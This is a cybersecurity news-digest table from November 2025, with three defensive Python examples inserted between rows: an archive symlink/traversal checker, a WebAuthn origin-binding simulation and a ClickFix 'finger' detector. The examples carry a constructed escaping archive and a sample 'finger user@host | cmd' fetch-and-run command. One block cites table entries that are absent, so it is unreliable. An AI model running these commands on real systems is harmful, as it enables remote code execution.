| 22.11.25 | OWASP Update Elevates Software Supply Chain and Misconfiguration Risk | The reputable and widely used Open Web Application Security Project (OWASP) Top 10 list just got its 8th update, and first update since 2021. One major and welcome change is that supply chain security has gone from not being a category at all to being the number three spot on the list. OWASP is shaking things up in other ways too, with one other new risk category and one consolidation. | Cyber blog | Eclypsium |
| 22.11.25 | Breaking Down S3 Ransomware: Variants, Attack Paths and Trend Vision One™ Defenses | In this blog entry, Trend™ Research explores how ransomware actors are shifting their focus to cloud-based assets, including the tactics used to compromise business-critical data in AWS environments. | Ransom blog | Trend Micro |
| 22.11.25 | Trend & AWS Partner on Cloud IPS: One-Click Protection | In the race to secure cloud infrastructure, intrusion prevention systems (IPS) remain one of the most critical, yet most complex, components of the cloud network layer of defense. For many organizations, deploying IPS in the cloud is a balancing act between agility and control. | Cyber blog | Trend Micro |
| 22.11.25 | Anatomy of an Akira Ransomware Attack: When a Fake CAPTCHA Led to 42 Days of Compromise | Unit 42 recently assisted a global data storage and infrastructure company that experienced a destructive ransomware attack. This attack was orchestrated by Howling Scorpius, the distributors of Akira ransomware. What began with a single click on what appeared to be a routine website CAPTCHA evolved into a 42-day (yes, we see the irony, too!) compromise that exposed critical gaps. | Ransom blog | Palo Alto |
| 22.11.25 | It’s not personal, it’s just business | Martin muses on how agentic AI is bringing efficiency improvements to the business of cyber crime. | Cyber blog | CISCO TALOS |
| 22.11.25 | Bill Largent: On epic reads, lifelong learning, and empathy | Join Bill Largent as he shares his passion for learning, the connection between reading and empathy, and offers fresh insights for the next generation of security professionals. | Cyber blog | CISCO TALOS |
| 22.11.25 | The OSINT playbook: Find your weak spots before attackers do | Here’s how open-source intelligence helps trace your digital footprint and uncover your weak points, plus a few essential tools to connect the dots | Cyber blog | Eset |
| 22.11.25 | PlushDaemon compromises network devices for adversary-in-the-middle attacks | ESET researchers have discovered a network implant used by the China-aligned PlushDaemon APT group to perform adversary-in-the-middle attacks | APT blog | Eset |
| 22.11.25 | What if your romantic AI chatbot can’t keep a secret? | Does your chatbot know too much? Here's why you should think twice before you tell your AI companion everything. | AI blog | Eset |
| 22.11.25 | License to Encrypt: “The Gentlemen” Make Their Move | Cybereason Threat Intelligence Team recently conducted an analysis of "The Gentlemen" ransomware group, which emerged around July 2025 as a ransomware threat actor group with relatively advanced methodologies. | Ransom blog | Cybereason |
| 22.11.25 | Defeating KASLR by Doing Nothing at All | I've recently been researching Pixel kernel exploitation and as part of this research I found myself with an excellent arbitrary write primitive…but without a KASLR leak. As necessity is the mother of all invention, on a hunch, I started researching the Linux kernel linear mapping. | Vulnerability blog | Project Zero |
| 22.11.25 | Today’s threat landscape demands a proactive OT security strategy | OT is increasingly targeted by cybercriminals, making it essential for organizations to prioritize proactive OT security defense. | Security blog | Trelix |
| 21.11.25 | Grafana Patches CVSS 10.0 SCIM Flaw Enabling Impersonation and Privilege Escalation | Grafana has released security updates to address a maximum severity security flaw that could allow privilege escalation or user impersonation under certain configurations. The | Vulnerability | The Hacker News |
| 21.11.25 | Google Brings AirDrop Compatibility to Android's Quick Share Using Rust-Hardened Security | In a surprise move, Google on Thursday announced that it has updated Quick Share, its peer-to-peer file transfer service, to work with Apple's AirDrop, allowing users to more | OS | The Hacker News |
| 21.11.25 | APT24 Deploys BADAUDIO in Years-Long Espionage Hitting Taiwan and 1,000+ Domains | A China-nexus threat actor known as APT24 has been observed using a previously undocumented malware dubbed BADAUDIO to establish persistent remote access to | APT | The Hacker News |
| 21.11.25 | SEC Drops SolarWinds Case After Years of High-Stakes Cybersecurity Scrutiny | The U.S. Securities and Exchange Commission (SEC) has abandoned its lawsuit against SolarWinds and its chief information security officer, alleging that the company had misled | Cyber | The Hacker News |
| 21.11.25 | Salesforce Flags Unauthorized Data Access via Gainsight-Linked OAuth Activity | Salesforce has warned of detected "unusual activity" related to Gainsight-published applications connected to the platform. "Our investigation indicates this activity may have | CyberCrime | The Hacker News |
| 21.11.25 | ShadowRay 2.0 Exploits Unpatched Ray Flaw to Build Self-Spreading GPU Cryptomining Botnet | Oligo Security has warned of ongoing attacks exploiting a two-year-old security flaw in the Ray open-source artificial intelligence (AI) framework to turn infected clusters with NVIDIA | Exploit | The Hacker News |
| 21.11.25 | Tsundere Botnet Expands Using Game Lures and Ethereum-Based C2 on Windows | Cybersecurity researchers have warned of an actively expanding botnet dubbed Tsundere that's targeting Windows users. Active since mid-2025, the threat is designed to execute | BotNet | The Hacker News |
| 20.11.25 | Google fixes new Chrome zero-day flaw exploited in attacks | Google has released an emergency security update to fix the seventh Chrome zero-day vulnerability exploited in attacks this year. | Exploit | |
| 20.11.25 | Microsoft: Windows 10 KB5072653 OOB update fixes ESU install errors | Microsoft has released an emergency Windows 10 KB5072653 out-of-band update to resolve ongoing issues with installing the November extended security updates. | OS | |
| 20.11.25 | Malicious NPM packages abuse Adspect redirects to evade security | Seven packages published on the Node Package Manager (npm) registry use the Adspect cloud-based service to separate researchers from potential victims and lead them to malicious locations. | Virus | |
| 20.11.25 | RondoDox botnet malware now hacks servers using XWiki flaw | The RondoDox botnet malware is now exploiting a critical remote code execution (RCE) flaw in XWiki Platform tracked as CVE-2025-24893. | Virus | |
| 20.11.25 | Eurofiber France warns of breach after hacker tries to sell customer data | Eurofiber France disclosed a data breach it discovered late last week when hackers gained access to its ticket management system by exploiting a vulnerability and exfiltrated information. | Incident | |
| 20.11.25 | Princeton University discloses data breach affecting donors, alumni | A Princeton University database was compromised in a cyberattack on November 10, exposing the personal information of alumni, donors, faculty members, and students. | Incident | |
| 20.11.25 | Dutch police seize 250 servers used by “bulletproof hosting” service | The police in the Netherlands have seized around 250 physical servers powering a bulletproof hosting service in the country used exclusively by cybercriminals for providing complete anonymity. | CyberCrime | |
| 20.11.25 | Microsoft: Azure hit by 15 Tbps DDoS attack using 500,000 IP addresses | Microsoft said today that the Aisuru botnet hit its Azure network with a 15.72 terabits per second (Tbps) DDoS attack, launched from over 500,000 IP addresses. | BotNet | |
| 20.11.25 | DoorDash email spoofing vulnerability sparks messy disclosure dispute | A vulnerability in DoorDash's systems could allow anyone to send "official" DoorDash-themed emails right from the company's authorized servers, paving a near-perfect phishing channel. DoorDash has now patched the issue, but a contentious disclosure dispute has erupted, with both sides accusing each other of acting in bad faith. | Vulnerability | |
| 20.11.25 | Pennsylvania AG confirms data breach after INC Ransom attack | The office of Pennsylvania's attorney general has confirmed that the ransomware gang behind an August 2025 cyberattack stole files containing personal and medical information. | Incident | |
| 20.11.25 | Microsoft: Windows bug blocks Microsoft 365 desktop app installs | Microsoft is working to resolve a known issue preventing users from installing the Microsoft 365 desktop apps on Windows devices. | OS | |
| 20.11.25 | Google to flag Android apps with excessive battery use on the Play Store | Google will start taking action on Android apps in the official Google Play store that have high background activity and cause excessive battery draining. | OS | |
| 20.11.25 | New Amazon Threat Intelligence findings: Nation-state actors bridging cyber and kinetic warfare | The line between cyber warfare and traditional kinetic operations is rapidly blurring. Recent investigations by Amazon threat intelligence teams have uncovered a new trend that they’re calling cyber-enabled kinetic targeting in which nation-state threat actors systematically use cyber operations to enable and enhance physical operations. | APT blog | AWS |
| 20.11.25 | ThreatsDay Bulletin: 0-Days, LinkedIn Spies, Crypto Crimes, IoT Flaws and New Malware Waves | This week has been crazy in the world of hacking and online security. From Thailand to London to the US, we've seen arrests, spies at work, and big power moves online. Hackers | Cyber | The Hacker News |
| 20.11.25 | New Sturnus Android Trojan Quietly Captures Encrypted Chats and Hijacks Devices | Cybersecurity researchers have disclosed details of a new Android banking trojan called Sturnus that enables credential theft and full device takeover to conduct financial fraud. "A | Virus | The Hacker News |
| 20.11.25 | Iran-Linked Hackers Mapped Ship AIS Data Days Before Real-World Missile Strike Attempt | Threat actors with ties to Iran engaged in cyber warfare as part of efforts to facilitate and enhance physical, real-world attacks, a trend that Amazon has called cyber-enabled kinetic | APT | The Hacker News |
| 20.11.25 | TamperedChef Malware Spreads via Fake Software Installers in Ongoing Global Campaign | Threat actors are leveraging bogus installers masquerading as popular software to trick users into installing malware as part of a global malvertising campaign dubbed | Virus | The Hacker News |
| 20.11.25 | Hackers Actively Exploiting 7-Zip Symbolic Link–Based RCE Vulnerability (CVE-2025-11001) | A recently disclosed security flaw impacting 7-Zip has come under active exploitation in the wild, according to an advisory issued by the U.K. NHS England Digital on Tuesday. The | Exploit | The Hacker News |
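The 7-Zip entry above names the flaw class (symbolic-link based) but not the mechanism. The general pattern behind archive symlink bugs is that an extractor first materialises a symlink member whose target points outside the extraction directory, then writes a later member whose path runs through that link, so the file lands wherever the link points. The following is an added pre-extraction check for that class, written for this page and not taken from 7-Zip, the NHS advisory, or The Hacker News; it makes no claim about the internals of CVE-2025-11001. It uses Python's stdlib zip support rather than the 7z format (assumption: the ordering logic is the same for any archive format that carries symlink members), and the archive it inspects is constructed in memory.

```python
import io
import posixpath
import stat
import zipfile


def normalised_name(member_name):
    """Normalise an archive member name; return None if it escapes the extraction root."""
    name = posixpath.normpath(member_name.replace("\\", "/"))
    if name.startswith("/") or name == ".." or name.startswith("../"):
        return None
    return name


def is_symlink(info):
    # zipfile keeps the Unix mode bits in the high 16 bits of external_attr
    return stat.S_ISLNK(info.external_attr >> 16)


def unsafe_members(zf):
    """Walk members in archive (= extraction) order and report anything that could
    write outside the extraction root: traversal in the name, a symlink whose
    target leaves the root, or a member whose path passes through an earlier
    symlink (the file would be written wherever that link points)."""
    findings = []
    links_seen = set()
    for info in zf.infolist():
        name = normalised_name(info.filename)
        if name is None:
            findings.append((info.filename, "path traversal in member name"))
            continue
        parts = name.split("/")
        for i in range(1, len(parts)):
            prefix = "/".join(parts[:i])
            if prefix in links_seen:
                findings.append((info.filename, f"path passes through symlink {prefix}"))
                break
        if is_symlink(info):
            target = zf.read(info).decode()  # a symlink member's data is its target
            resolved = posixpath.normpath(posixpath.join(posixpath.dirname(name), target))
            if target.startswith("/") or resolved == ".." or resolved.startswith("../"):
                findings.append((info.filename, f"symlink target escapes root: {target}"))
            links_seen.add(name)
    return findings


def build_sample_archive():
    """Constructed sample archive: a benign file, a symlink pointing outside the
    root, a file whose path goes through that link, and a plain '..' name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "benign content")
        link = zipfile.ZipInfo("lnk")
        link.external_attr = (stat.S_IFLNK | 0o777) << 16  # mark member as a symlink
        zf.writestr(link, "../../../../tmp")
        zf.writestr("lnk/payload.sh", "#!/bin/sh\necho pwned\n")
        zf.writestr("../escape.txt", "classic zip slip")
    buf.seek(0)
    return buf


def scan_sample():
    with zipfile.ZipFile(build_sample_archive()) as zf:
        return unsafe_members(zf)


if __name__ == "__main__":
    for member, reason in scan_sample():
        print(f"REJECT {member!r}: {reason}")
```

Run `unsafe_members()` before extracting anything and refuse the whole archive if it returns findings; checking members one at a time during extraction is exactly the ordering that the symlink-then-file sequence exploits.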
| 19.11.25 | Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices | Cybersecurity researchers have disclosed details of a new campaign that leverages a combination of social engineering and WhatsApp hijacking to distribute a Delphi-based | Virus | The Hacker News |
| 19.11.25 | WrtHug Exploits Six ASUS WRT Flaws to Hijack Tens of Thousands of EoL Routers Worldwide | A newly discovered campaign has compromised tens of thousands of outdated or end-of-life (EoL) ASUS routers worldwide, predominantly in Taiwan, the U.S., and Russia, to rope them | Exploit | The Hacker News |
| 19.11.25 | EdgeStepper Implant Reroutes DNS Queries to Deploy Malware via Hijacked Software Updates | The threat actor known as PlushDaemon has been observed using a previously undocumented Go-based network backdoor codenamed EdgeStepper to facilitate adversary- | Virus | The Hacker News |
| 19.11.25 | ServiceNow AI Agents Can Be Tricked Into Acting Against Each Other via Second-Order Prompts | Malicious actors can exploit default configurations in ServiceNow's Now Assist generative artificial intelligence (AI) platform and leverage its agentic capabilities to conduct prompt | AI | The Hacker News |
| 19.11.25 | Fortinet Warns of New FortiWeb CVE-2025-58034 Vulnerability Exploited in the Wild | Fortinet has warned of a new security flaw in FortiWeb that it said has been exploited in the wild. The medium-severity vulnerability, tracked as CVE-2025-58034 , carries a CVSS score of | Vulnerability | The Hacker News |
| 19.11.25 | Sneaky 2FA Phishing Kit Adds BitB Pop-ups Designed to Mimic the Browser Address Bar | The malware authors associated with a Phishing-as-a-Service (PhaaS) kit known as Sneaky 2FA have incorporated Browser-in-the-Browser (BitB) functionality into their arsenal, | Phishing | The Hacker News |
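The Tycoon 2FA and Sneaky 2FA entries (22.11.25 and above) describe real-time adversary-in-the-middle relays, and the Token Ring entry claims FIDO2 stops them. The reason is origin binding: the browser, not the page, writes the page's real origin into clientDataJSON, and the authenticator signs over a hash of that JSON, so a proxy on a look-alike domain cannot produce an assertion the genuine site will accept. The example below is added here to show the relying-party side of that check; it is not code from Token Ring, CYFIRMA, Push Security, or any WebAuthn library. The origins, the challenge bytes and the OTP value are constructed, and signature verification itself is represented only by the clientDataHash comparison (assumption: a real RP verifies an ECDSA/RSA signature over authenticatorData || clientDataHash).

```python
import base64
import hashlib
import hmac
import json

RP_ORIGIN = "https://login.example.com"      # assumed: the genuine relying party origin
PHISH_ORIGIN = "https://login-example.com"   # assumed: the AitM proxy's look-alike origin


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def browser_client_data(origin, challenge_b64):
    """The clientDataJSON a browser builds for navigator.credentials.get().
    The browser fills in `origin` from the page's real origin; page script
    (and therefore a phishing proxy serving that page) cannot override it."""
    return json.dumps({"type": "webauthn.get", "challenge": challenge_b64,
                       "origin": origin}, separators=(",", ":")).encode()


def client_data_hash(client_data):
    # the authenticator signs authenticatorData || SHA-256(clientDataJSON)
    return hashlib.sha256(client_data).digest()


def rp_verify_client_data(client_data, expected_challenge_b64):
    """Relying-party checks from WebAuthn assertion verification: type, challenge, origin."""
    data = json.loads(client_data)
    if data.get("type") != "webauthn.get":
        return False, "unexpected type"
    if data.get("challenge") != expected_challenge_b64:
        return False, "challenge mismatch"
    if data.get("origin") != RP_ORIGIN:
        return False, f"origin mismatch: {data.get('origin')!r}"
    return True, "ok"


def simulate_relay(challenge):
    """AitM flow: the proxy fetches a real challenge from the RP and forwards it to the
    victim's browser unchanged. The victim's browser is on the phishing origin, so that
    is what lands in clientDataJSON, and the RP rejects the assertion."""
    challenge_b64 = b64url_encode(challenge)
    relayed = browser_client_data(PHISH_ORIGIN, challenge_b64)
    accepted, reason = rp_verify_client_data(relayed, challenge_b64)
    # The proxy cannot simply rewrite the origin on the way back: that changes the
    # bytes the authenticator signed over, so clientDataHash (and the signature
    # check built on it) no longer match.
    patched = browser_client_data(RP_ORIGIN, challenge_b64)
    patching_breaks_signature = client_data_hash(patched) != client_data_hash(relayed)
    return {"accepted": accepted, "reason": reason,
            "patching_breaks_signature": patching_breaks_signature}


def simulate_direct(challenge):
    """Same ceremony with the user on the genuine origin."""
    challenge_b64 = b64url_encode(challenge)
    client_data = browser_client_data(RP_ORIGIN, challenge_b64)
    accepted, reason = rp_verify_client_data(client_data, challenge_b64)
    return {"accepted": accepted, "reason": reason}


def relayed_otp_is_accepted(code_from_victim, code_expected):
    """Contrast: an app-generated OTP carries no origin binding, so a code typed into
    the phishing page and forwarded by the proxy verifies exactly like one typed into
    the real site. This is the property the relay kits above depend on."""
    return hmac.compare_digest(code_from_victim, code_expected)


if __name__ == "__main__":
    ch = bytes(range(32))  # constructed challenge; a real RP uses random bytes
    print("FIDO2 via relay:", simulate_relay(ch))
    print("FIDO2 direct:   ", simulate_direct(ch))
    print("OTP via relay accepted:", relayed_otp_is_accepted("482913", "482913"))
```

The check only holds if the RP compares the origin against an allow-list of its own origins exactly (scheme, host and port) and does not fall back to a substring or "ends with" match; the look-alike domain in the example would pass a sloppy suffix check on `example.com`.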
| 19.11.25 | Meta Expands WhatsApp Security Research with New Proxy Tool and $4M in Bounties This Year | Meta on Tuesday said it has made available a tool called WhatsApp Research Proxy to some of its long-time bug bounty researchers to help improve the program and more effectively | Social | The Hacker News |
| 18.11.25 | Frontline Intelligence: Analysis of UNC1549 TTPs, Custom Tools, and Malware Targeting the Aerospace and Defense Ecosystem | Last year, Mandiant published a blog post highlighting suspected Iran-nexus espionage activity targeting the aerospace, aviation, and defense industries in the Middle East. In this follow-up post, Mandiant discusses additional tactics, techniques, and procedures (TTPs) observed in incidents Mandiant has responded to. | APT blog | Google Threat Intelligence |
| 18.11.25 | Researchers Detail Tuoni C2's Role in an Attempted 2025 Real-Estate Cyber Intrusion | Cybersecurity researchers have disclosed details of a cyber attack targeting a major U.S.-based real-estate company that involved the use of a nascent command-and-control (C2) | ICS | The Hacker News |
| 18.11.25 | Iranian Hackers Use DEEPROOT and TWOSTROKE Malware in Aerospace and Defense Attacks | Suspected espionage-driven threat actors from Iran have been observed deploying backdoors like TWOSTROKE and DEEPROOT as part of continued attacks aimed at | Virus | The Hacker News |
| 18.11.25 | Seven npm Packages Use Adspect Cloaking to Trick Victims Into Crypto Scam Pages | Cybersecurity researchers have discovered a set of seven npm packages published by a single threat actor that leverages a cloaking service called Adspect to differentiate between | Spam | The Hacker News |
| 18.11.25 | Microsoft Mitigates Record 15.72 Tbps DDoS Attack Driven by AISURU Botnet | Microsoft on Monday disclosed that it automatically detected and neutralized a distributed denial-of-service (DDoS) attack targeting a single endpoint in Australia that measured 15.72 | Attack | The Hacker News |
| 18.11.25 | Google Issues Security Fix for Actively Exploited Chrome V8 Zero-Day Vulnerability | Google on Monday released security updates for its Chrome browser to address two security flaws, including one that has come under active exploitation in the wild. The vulnerability in | Exploit | The Hacker News |
| 18.11.25 | New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT | Cybersecurity researchers have discovered malware campaigns using the now-prevalent ClickFix social engineering tactic to deploy Amatera Stealer and NetSupport RAT . The | Virus | The Hacker News |
| 17.11.25 | Dragon Breath Uses RONINGLOADER to Disable Security Tools and Deploy Gh0st RAT | The threat actor known as Dragon Breath has been observed making use of a multi-stage loader codenamed RONINGLOADER to deliver a modified variant of a remote access trojan | Virus | The Hacker News |
| 17.11.25 | Rust Adoption Drives Android Memory Safety Bugs Below 20% for First Time | Google has disclosed that the company's continued adoption of the Rust programming language in Android has resulted in the number of memory safety vulnerabilities falling below | Virus | The Hacker News |
| 16.11.25 | Microsoft: Windows 10 KB5068781 ESU update may fail with 0x800f0922 errors | Microsoft has confirmed it is investigating a bug causing the Windows 10 KB5068781 extended security update to fail to install with 0x800f0922 errors on devices with corporate licensing. | OS | |
| 16.11.25 | Decades-old ‘Finger’ protocol abused in ClickFix malware attacks | The decades-old "finger" command is making a comeback, with threat actors using the protocol to retrieve remote commands to execute on Windows devices. | Virus | |
| 16.11.25 | Jaguar Land Rover cyberattack cost the company over $220 million | Jaguar Land Rover (JLR) published its financial results for July 1 to September 30, warning that the cost of a recent cyberattack totaled £196 million ($220 million) in the quarter. | Incident | |
| 16.11.25 | Logitech confirms data breach after Clop extortion attack | Hardware accessory giant Logitech has confirmed it suffered a data breach in a cyberattack claimed by the Clop extortion gang, which conducted Oracle E-Business Suite data theft attacks in July. | Incident | |
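The Finger/ClickFix entry above says attackers use `finger` to fetch commands that are then executed on the Windows host. In practice that means `finger.exe` (a client for the TCP/79 Finger protocol that ships with Windows) is run with a `user@host` argument and its output is piped into `cmd`, typically from a command the victim pasted into the Run dialog. That is cheap to spot in process-creation telemetry (Sysmon Event ID 1, or Security 4688 with command-line auditing on). The detector below is an added example for this page, not code from BleepingComputer or from any vendor rule set; the event field names are assumed and the four events are constructed, with a 203.0.113.x documentation address standing in for the attacker's host.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal view of a process-creation event (Sysmon Event ID 1 / 4688-style)."""
    ts: str
    image: str
    cmdline: str
    parent_image: str


# constructed sample events, not real telemetry
SAMPLE_EVENTS = [
    ProcEvent("2025-11-14T09:12:03Z", r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c "finger update@203.0.113.10 | cmd"', r"C:\Windows\explorer.exe"),
    ProcEvent("2025-11-14T09:12:04Z", r"C:\Windows\System32\finger.exe",
              "finger update@203.0.113.10", r"C:\Windows\System32\cmd.exe"),
    ProcEvent("2025-11-14T10:41:55Z", r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c "ping -n 1 10.0.0.7"', r"C:\Windows\explorer.exe"),
    ProcEvent("2025-11-14T11:02:19Z", r"C:\Windows\System32\notepad.exe",
              "notepad.exe notes.txt", r"C:\Windows\explorer.exe"),
]

# finger [-l] user@host ; capture the host part
FINGER_QUERY = re.compile(r"\bfinger(?:\.exe)?\s+(?:-l\s+)?\S+?@([\w.\-]+)", re.I)
# finger output fed straight into an interpreter
PIPED_TO_SHELL = re.compile(r"\|\s*(?:cmd|powershell|pwsh)(?:\.exe)?\b", re.I)
# parents that indicate a user-driven launch (Run dialog, double-click)
USER_LAUNCHERS = ("explorer.exe",)


def classify(ev):
    """Return (severity, reasons) for a suspicious finger invocation, else None."""
    m = FINGER_QUERY.search(ev.cmdline)
    if not m:
        return None
    host = m.group(1).lower()
    if host in ("localhost", "127.0.0.1"):
        return None  # assumed benign: local lookups, no remote fetch
    reasons = [f"finger query to remote host {host} (TCP/79, cleartext)"]
    piped = bool(PIPED_TO_SHELL.search(ev.cmdline))
    if piped:
        reasons.append("finger output piped straight into a shell")
    parent = ev.parent_image.lower().rsplit("\\", 1)[-1]
    if parent in USER_LAUNCHERS:
        reasons.append("launched from Explorer/Run dialog, consistent with ClickFix paste-and-run")
    return ("high" if piped else "medium"), reasons


def detect(events):
    """Run classify() over a batch and return (timestamp, severity, reasons) per hit."""
    alerts = []
    for ev in events:
        result = classify(ev)
        if result:
            alerts.append((ev.ts, result[0], result[1]))
    return alerts


if __name__ == "__main__":
    for ts, severity, reasons in detect(SAMPLE_EVENTS):
        print(ts, severity.upper(), "; ".join(reasons))
```

Because `finger.exe` has almost no legitimate use on modern Windows estates, the medium-severity hit (any remote query) is usually worth alerting on by itself; blocking outbound TCP/79 at the egress firewall removes the fetch channel entirely.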
| 16.11.25 | Five plead guilty to helping North Koreans infiltrate US firms | The U.S. Department of Justice announced that five individuals pleaded guilty to aiding North Korea's illicit revenue generation schemes, including remote IT worker fraud and cryptocurrency theft. | APT | |
| 16.11.25 | Anthropic claims of Claude AI-automated cyberattacks met with doubt | Anthropic reports that a Chinese state-sponsored threat group, tracked as GTG-1002, carried out a cyber-espionage operation that was largely automated through the abuse of the company's Claude Code AI model. | AI | |
| 16.11.25 | Fortinet confirms silent patch for FortiWeb zero-day exploited in attacks | Fortinet has silently patched a critical zero-day vulnerability in its FortiWeb web application firewall, which is now being widely exploited. | Exploit | |
| 16.11.25 | Checkout.com snubs hackers after data breach, to donate ransom instead | UK financial technology company Checkout announced that the ShinyHunters threat group has breached one of its legacy cloud storage systems and is now extorting the company for a ransom. | Ransom | |
| 16.11.25 | US announces new strike force targeting Chinese crypto scammers | U.S. federal authorities have established a new task force to disrupt Chinese cryptocurrency scam networks that defraud Americans of nearly $10 billion annually. | Spam | |
| 16.11.25 | Google backpedals on new Android developer registration rules | Google is backpedaling on its decision to introduce new identity verification rules for all developers, stating that it will also introduce accounts for limited app distribution and will allow users to install apps from unverified devs. | Virus | |
| 16.11.25 | ASUS warns of critical auth bypass flaw in DSL series routers | ASUS has released new firmware to patch a critical authentication bypass security flaw impacting several DSL series router models. | Vulnerability | |
| 16.11.25 | DoorDash hit by new data breach in October exposing user information | DoorDash has disclosed a data breach that hit the food delivery platform this October. Beginning yesterday evening, DoorDash, which serves millions of customers across the U.S., Canada, Australia, and New Zealand, started emailing those impacted by the newly discovered security incident. | Incident | |
| 16.11.25 | Fortinet FortiWeb flaw with public PoC exploited to create admin users | A Fortinet FortiWeb path traversal vulnerability is being actively exploited to create new administrative users on exposed devices without requiring authentication | Exploit | |
| 16.11.25 | Kraken ransomware benchmarks systems for optimal encryption choice | The Kraken ransomware, which targets Windows, Linux/VMware ESXi systems, is testing machines to check how fast it can encrypt data without overloading them. | Ransom | |
| 16.11.25 | CISA warns of Akira ransomware Linux encryptor targeting Nutanix VMs | US government agencies are warning that the Akira ransomware operation has been spotted encrypting Nutanix AHV virtual machines in attacks. | Ransom | |
| 16.11.25 | New ‘IndonesianFoods’ spammer floods npm with 150,000 packages | An auto-spamming payload published on npm spams the registry by spawning new packages every seven seconds, creating large volumes of junk. | Spam | |
| 16.11.25 | RCE flaw in ImunifyAV puts millions of Linux-hosted sites at risk | The ImunifyAV malware scanner for Linux servers, used by tens of millions of websites, is vulnerable to a remote code execution vulnerability that could be exploited to compromise the hosting environment. | Vulnerability | |
| 16.11.25 | Washington Post data breach impacts nearly 10K employees, contractors | The Washington Post is notifying nearly 10,000 employees and contractors that some of their personal and financial data has been exposed in the Oracle data theft attack. | Incident | |
| 16.11.25 | Microsoft rolls out screen capture prevention for Teams users | Microsoft is rolling out a new Teams feature for Premium customers that will automatically block screenshots and recordings during meetings. | OS | |
| 16.11.25 | Popular Android-based photo frames download malware on boot | Uhale Android-based digital picture frames come with multiple critical security vulnerabilities and some of them download and execute malware at boot time. | Virus | |
| 16.11.25 | CISA warns feds to fully patch actively exploited Cisco flaws | CISA warned federal agencies to fully patch two actively exploited vulnerabilities in Cisco Adaptive Security Appliances (ASA) and Firepower devices. | Exploit | |
| 16.11.25 | Police disrupt Rhadamanthys, VenomRAT, and Elysium malware operations | Law enforcement authorities from 9 countries have taken down 1,025 servers used by the Rhadamanthys infostealer, VenomRAT, and Elysium botnet malware operations in the latest phase of Operation Endgame, an international action targeting cybercrime. | CyberCrime | |
| 16.11.25 | CISA warns of WatchGuard firewall flaw exploited in attacks | CISA has ordered federal agencies to patch an actively exploited vulnerability in WatchGuard Firebox firewalls, which allows attackers to gain remote code execution on compromised devices. | Vulnerability | |
| 16.11.25 | Google sues to dismantle Chinese phishing platform behind US toll scams | Google has filed a lawsuit to dismantle the "Lighthouse" phishing-as-a-service platform used by cybercriminals worldwide to steal credit card information through SMS phishing attacks impersonating the U.S. Postal Service and E-ZPass toll systems. | Phishing | |
| 16.11.25 | Windows 11 now supports 3rd-party apps for native passkey management | Microsoft announced that passwordless authentication is now easier on Windows 11 through native support for third-party passkey managers, the first ones supported being 1Password and Bitwarden. | OS | |
| 16.11.25 | DanaBot malware is back to infecting Windows after 6-month break | The DanaBot malware has returned with a new version observed in attacks, six-months after law enforcement's Operation Endgame disrupted its activity in May. | Virus | |
| 16.11.25 | RondoDox Exploits Unpatched XWiki Servers to Pull More Devices Into Its Botnet | The botnet malware known as RondoDox has been observed targeting unpatched XWiki instances against a critical security flaw that could allow attackers to achieve arbitrary code | Virus | The Hacker News |
| 16.11.25 | Five Plead Guilty in U.S. for Helping North Korean IT Workers Infiltrate 136 Companies | The U.S. Department of Justice (DoJ) on Friday announced that five individuals have pleaded guilty to assisting North Korea's illicit revenue generation schemes by enabling information | APT | The Hacker News |
| 15.11.25 | Microsoft fixes bug causing false Windows 10 end-of-support alerts | Microsoft has resolved a bug causing incorrect Windows 10 end-of-support warnings on systems with active security coverage or still under active support after installing the October 2025 updates. | OS | |
| 15.11.25 | Extending Zero Trust to AI Agents: “Never Trust, Always Verify” Goes Autonomous | As AI agents gain autonomy to act, decide, and access data, traditional Zero Trust models fall short. Token Security explains how to extend "never trust, always verify" to agentic AI with scoped access, continuous monitoring, and human accountability. | AI | |
| 15.11.25 | New UK laws to strengthen critical infrastructure cyber defenses | The United Kingdom has introduced new legislation to boost cybersecurity defenses for hospitals, energy systems, water supplies, and transport networks against cyberattacks, linked to annual damages of nearly £15 billion ($19.6 billion). | Cyber | |
| 15.11.25 | Hackers exploited Citrix, Cisco ISE flaws in zero-day attacks | An advanced threat actor exploited the critical vulnerabilities "Citrix Bleed 2" (CVE-2025-5777) in NetScaler ADC and Gateway, and CVE-2025-20337 affecting Cisco Identity Service Engine (ISE) as zero-days to deploy custom malware. | Exploit | |
| 15.11.25 | Synnovis notifies of data breach after 2024 ransomware attack | Synnovis, a leading UK pathology services provider, is notifying healthcare providers that a data breach occurred following a ransomware attack in June 2024, which resulted in the theft of some patients' data. | Ransom | |
| 15.11.25 | Microsoft fixes Windows Task Manager bug affecting performance | Microsoft has resolved a known issue preventing users from quitting the Windows 11 Task Manager after installing the optional Windows 11 KB5067036 update. | OS | |
| 15.11.25 | Rhadamanthys infostealer disrupted as cybercriminals lose server access | The Rhadamanthys infostealer operation has been disrupted, with numerous "customers" of the malware-as-a-service reporting that they no longer have access to their servers. | Virus | |
| 15.11.25 | Synology fixes BeeStation zero-days demoed at Pwn2Own Ireland | Synology has addressed a critical-severity remote code execution (RCE) vulnerability in BeeStation products that was demonstrated at the recent Pwn2Own hacking competition. | Exploit | |
| 15.11.25 | Hackers abuse Triofox antivirus feature to deploy remote access tools | Hackers exploited a critical vulnerability and the built-in antivirus feature in Gladinet's Triofox file-sharing and remote-access platform to achieve remote code execution with SYSTEM privileges. | Exploit | |
| 15.11.25 | Microsoft: Windows 11 23H2 Home and Pro reach end of support | Microsoft has reminded customers today that systems running Home and Pro editions of Windows 11 23H2 have stopped receiving security updates. | OS | BleepingComputer |
| 15.11.25 | North Korean Hackers Turn JSON Services into Covert Malware Delivery Channels | The North Korean threat actors behind the Contagious Interview campaign have once again tweaked their tactics by using JSON storage services to stage malicious payloads. "The | Virus | The Hacker News |
| 15.11.25 | Researchers Find Serious AI Bugs Exposing Meta, Nvidia, and Microsoft Inference Frameworks | Cybersecurity researchers have uncovered critical remote code execution vulnerabilities impacting major artificial intelligence (AI) inference engines, including those from Meta, | AI | The Hacker News |
| 15.11.25 | Iranian Hackers Launch 'SpearSpecter' Spy Operation on Defense & Government Targets | The Iranian state-sponsored threat actor known as APT42 has been observed targeting individuals and organizations that are of interest to the Islamic Revolutionary Guard Corps | APT | The Hacker News |
